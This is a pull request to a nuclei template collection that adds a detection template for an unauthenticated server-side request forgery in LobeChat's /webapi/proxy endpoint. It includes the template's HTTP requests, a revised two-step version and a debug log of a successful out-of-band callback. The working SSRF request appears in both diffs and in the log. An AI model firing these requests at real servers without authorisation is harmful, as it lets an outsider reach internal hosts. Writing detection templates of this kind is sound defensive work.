### PR TITLE
Add CVE-2026-54157 LobeHub SSRF template

### DIFF
--- a/http/cves/2026/CVE-2026-54157.yaml
+++ b/http/cves/2026/CVE-2026-54157.yaml
@@ -5,13 +5,9 @@ info:
   author: 0xj3st3r
   severity: medium
   description: |
-    LobeHub LobeChat versions up to and including 2.1.56 are vulnerable to an
-    unauthenticated server-side request forgery vulnerability in the /webapi/proxy
-    endpoint. The endpoint accepts a URL in the POST request body and fetches it
-    server-side without authentication.
+    LobeHub LobeChat versions up to and including 2.1.56 are vulnerable to an unauthenticated server-side request forgery vulnerability in the /webapi/proxy endpoint. The endpoint accepts a URL in the POST request body and fetches it server-side without authentication.
   impact: |
-    An unauthenticated attacker can cause the server to perform arbitrary outbound
-    HTTP requests.
+    An unauthenticated attacker can cause the server to perform arbitrary outbound HTTP requests.
   remediation: |
     Upgrade LobeHub LobeChat to version 2.1.57 or later.
   reference:
@@ -22,22 +18,38 @@ info:
     cwe-id: CWE-918
   metadata:
     verified: true
+    max-request: 2
     vendor: lobehub
-    product: lobechat
-  tags: cve,cve2026,lobehub,lobechat,ssrf,oast
+    product: lobe-chat
+    fofa-query: icon_hash="1975020705"
+  tags: cve,cve2026,lobechat,ssrf,vuln,unauth
+
+flow: http(1) && http(2)
 
 http:
   - raw:
       - |
-        POST /webapi/proxy HTTP/1.1
+        GET /welcome HTTP/1.1
         Host: {{Hostname}}
-        Content-Type: text/plain;charset=UTF-8
-        Accept: */*
-        Connection: close
-
-        http://{{interactsh-url}}/lobehub-cve-2026-54157
 
     matchers:
       - type: dsl
         dsl:
-          - 'interactsh_protocol == "http" && contains(interactsh_request, "lobehub-cve-2026-54157")'
+          - 'contains(tolower(body), "lobechat")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        POST /webapi/proxy HTTP/1.1
+        Host: {{Hostname}}
+
+        http://oast.me
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "<h1> Interactsh Server </h1>")'
+        condition: and

--- a/http/cves/2026/CVE-2026-54157.yaml
+++ b/http/cves/2026/CVE-2026-54157.yaml
@@ -1,0 +1,43 @@
+id: CVE-2026-54157
+
+info:
+  name: LobeHub LobeChat <= 2.1.56 - Server-Side Request Forgery
+  author: 0xj3st3r
+  severity: medium
+  description: |
+    LobeHub LobeChat versions up to and including 2.1.56 are vulnerable to an
+    unauthenticated server-side request forgery vulnerability in the /webapi/proxy
+    endpoint. The endpoint accepts a URL in the POST request body and fetches it
+    server-side without authentication.
+  impact: |
+    An unauthenticated attacker can cause the server to perform arbitrary outbound
+    HTTP requests.
+  remediation: |
+    Upgrade LobeHub LobeChat to version 2.1.57 or later.
+  reference:
+    - https://github.com/lobehub/lobehub/security/advisories/GHSA-xmwj-c75x-6346
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-54157
+  classification:
+    cve-id: CVE-2026-54157
+    cwe-id: CWE-918
+  metadata:
+    verified: true
+    vendor: lobehub
+    product: lobechat
+  tags: cve,cve2026,lobehub,lobechat,ssrf,oast
+
+http:
+  - raw:
+      - |
+        POST /webapi/proxy HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/plain;charset=UTF-8
+        Accept: */*
+        Connection: close
+
+        http://{{interactsh-url}}/lobehub-cve-2026-54157
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'interactsh_protocol == "http" && contains(interactsh_request, "lobehub-cve-2026-54157")'


### PR DESCRIPTION
### PR Information

This PR adds a detection template for CVE-2026-54157 / GHSA-xmwj-c75x-6346, an unauthenticated SSRF vulnerability in LobeHub’s /webapi/proxy endpoint.

**References:** 
- https://github.com/lobehub/lobehub/security/advisories/GHSA-xmwj-c75x-6346
- https://github.com/advisories/GHSA-xmwj-c75x-6346

### Template validation

``` bash
nuclei -u https://example.local/ -t CVE-2026-54157.yaml -v -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.9.0

		projectdiscovery.io

[VER] Started metrics server at localhost:9092
[VER] Saved 1 templates to metadata cache
[INF] Current nuclei version: v3.9.0 (latest)
[INF] Current nuclei-templates version: v10.4.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 179
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.me
[INF] [CVE-2026-54157] Dumped HTTP request for https://example.local/webapi/proxy

POST /webapi/proxy HTTP/1.1
Host: example.local
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/6.0
Content-Length: 71
Accept: */*
Connection: close
Content-Type: text/plain;charset=UTF-8
Accept-Encoding: gzip

http://d8oj41215062216lfv805r8bko45bw3ze.oast.me/lobehub-cve-2026-54157
[VER] [CVE-2026-54157] Sent HTTP request to https://example.local/webapi/proxy
[DBG] [CVE-2026-54157] Dumped HTTP response https://example.local/webapi/proxy

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Jun 2026 11:22:45 GMT
Server: oast.me
Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch
X-Interactsh-Version: 1.3.0
X-Robots-Tag: all

<html><head></head><body>ez3wb54okb8r508vfl61226051214jo8d</body></html>
[d8oj41215062216lfv805r8bko45bw3ze] Received HTTP interaction from 52.29.142.131 at 2026-06-16 11:22:45
------------
HTTP Request
------------

GET /lobehub-cve-2026-54157 HTTP/1.1
Host: d8oj41215062216lfv805r8bko45bw3ze.oast.me
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
User-Agent: node-fetch




------------
HTTP Response
------------

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.me
X-Interactsh-Version: 1.3.0

<html><head></head><body>ez3wb54okb8r508vfl61226051214jo8d</body></html>

[CVE-2026-54157:dsl-1] [http] [medium] https://example.local/webapi/proxy
[INF] Scan completed in 7.111397365s. 1 matches found.
```

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
